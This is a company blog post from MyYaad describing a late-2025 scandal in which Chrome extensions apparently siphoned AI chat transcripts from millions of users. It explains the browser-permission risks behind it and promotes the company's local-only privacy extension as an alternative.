← Back to Blog
·7 min read·MyYaad Team

Chrome Extensions Harvested 8M Users' AI Chats — What This Means for You

Chrome extensionAI privacydata breachbrowser security

In late 2025, researchers uncovered one of the more quietly damaging privacy scandals in recent browser history. A cluster of Chrome extensions — several of them explicitly marketed as privacy and productivity tools — had been silently transmitting users' AI conversation data to remote servers. The affected extensions had accumulated over eight million installs between them.

The coverage that followed on The Register and Hacker News was sharp, but the deeper problem was underreported: this was not an isolated incident of malware. These extensions operated exactly as their developers intended. The data collection was a feature, not a bug.

---

What Happened: The December 2025 Extension Scandal

The extensions in question were designed to integrate with AI platforms — tools that positioned themselves as assistants for organising, summarising, or enhancing conversations with ChatGPT, Claude, and similar services. Several carried four and five star reviews. Their permissions looked standard: access to tab content, access to specific websites.

What users did not know was that every conversation passing through those pages was being intercepted at the content script level and relayed to collection servers operated by the extension developers. In at least two cases, the privacy policies technically disclosed this — buried under language about "service improvement" and "anonymised analytics."

Researchers identified the pattern by analysing network traffic while using the extensions. The data being sent was not anonymised in any meaningful sense. It included full conversation transcripts, timestamps, and in some cases the usernames or account identifiers that the AI platforms embedded in their page structure.

Google removed the extensions after disclosure, but not before they had been active for months. The collected data — its current location and how it has been used — remains unknown.

---

Why Privacy Extensions Are a Trust Problem

The scandal exposed a structural problem that no amount of better enforcement will fully solve: browser extensions require an extraordinary level of trust, and users have no reliable way to verify that trust is warranted.

A Chrome extension with permission to read page content on chat.openai.com can read everything on that page. The entire conversation. Every message you have ever sent. Every response you received. The extension can send that content anywhere it chooses, and your browser will not warn you — because you already granted the permission when you installed the tool.

This is not a flaw in how these particular extensions were built. It is the architecture of browser extensions. Content scripts run inside the page context. They see what you see. The difference between a legitimate integration and a data harvester is the developer's intent — and intent is not inspectable.

There is a further wrinkle. Extensions can update silently. An extension that behaves honestly at install time can add data collection in a subsequent update. Chrome's permission model will alert you to new permissions, but updated behaviour within existing permissions goes unnoticed. The December 2025 extensions almost certainly did not launch with aggressive harvesting. That came later, as their user bases grew large enough to make the data commercially interesting.

The advice to "read the privacy policy" or "only install extensions with source code available" is not wrong, but it is not practical at scale. Most users cannot audit JavaScript, and privacy policies are written by lawyers for legal compliance, not for user comprehension.

---

The Architecture That Prevents This

The core problem with cloud-connected privacy tools — whether extensions, apps, or services — is that they create a remote server that holds your data, controlled by someone other than you. Once your data touches a remote server, you are dependent on that party's security practices, business model, legal exposure, and continued good intentions. History suggests that dependence is risky.

Local-only architecture eliminates this risk class entirely.

MyYaad is built on a different model. Your vault — the store of personal context you want to use with AI tools — lives on your device only. The browser extension does not transmit your data to MyYaad servers, because there are no MyYaad servers involved in the data path. The extension communicates with a local daemon running at 127.0.0.1. Your data never leaves your machine.

When you use an AI platform, the extension intercepts outgoing prompts and substitutes shadow values in place of real personal data before the request reaches the AI provider's servers. The AI receives obfuscated identifiers — not your actual name, medical history, or financial details. When the response comes back, the extension reverses the substitution locally so you see natural, coherent output.

There is no central server to breach. There is no company holding a database of eight million users' AI conversations. If MyYaad's servers were compromised tomorrow, the attacker would find nothing — because the personal data was never there.

This is not a policy or a promise. It is a consequence of how the software is built.

---

How to Evaluate an AI Privacy Tool

The December 2025 scandal should change how people evaluate browser extensions that handle sensitive data. The key questions are architectural, not reputational.

Where does the data go? Any tool that sends your AI conversation content to a remote server is a potential liability, regardless of how the privacy policy frames it. Ask explicitly: does this tool phone home with my conversation data? Is there a network request to the developer's servers while I am chatting with an AI?

What permissions does it request? Read access to page content on AI platforms is necessary for any integration tool. But that permission is also the one that enabled the December 2025 harvesting. Granting it is a decision to trust the developer permanently, including through future updates.

Is the data path inspectable? Open source extensions allow independent review. Closed source extensions require you to take the developer's word. That is not a dealbreaker, but it is a risk factor worth weighing.

What happens if the company is acquired, shuts down, or is breached? For cloud-connected tools, the answer is often: your historical data is now someone else's problem. For local-only tools, the answer is: nothing, because the data was always on your device.

Does the architecture make the privacy claim structurally true? "We take privacy seriously" is a statement anyone can make. "Your data never leaves your device because there is no mechanism for it to do so" is a verifiable architectural claim. Prefer the latter.

---

The extensions caught in December 2025 were not anomalies. They were the predictable outcome of giving third-party software privileged access to sensitive data streams, with no structural constraint on what it can do with that access.

The answer is not to stop using browser extensions. It is to understand what you are trusting when you install one, and to prefer tools where good privacy behaviour is enforced by design rather than promised by policy.

If you want to bring personal context to your AI conversations without putting that context at risk, download MyYaad and see how the local-first approach works in practice. You can also compare the architectural approaches side by side to understand the difference.

Your AI conversations contain more sensitive information than most people realise. The infrastructure handling that data deserves more scrutiny than a star rating and an install count.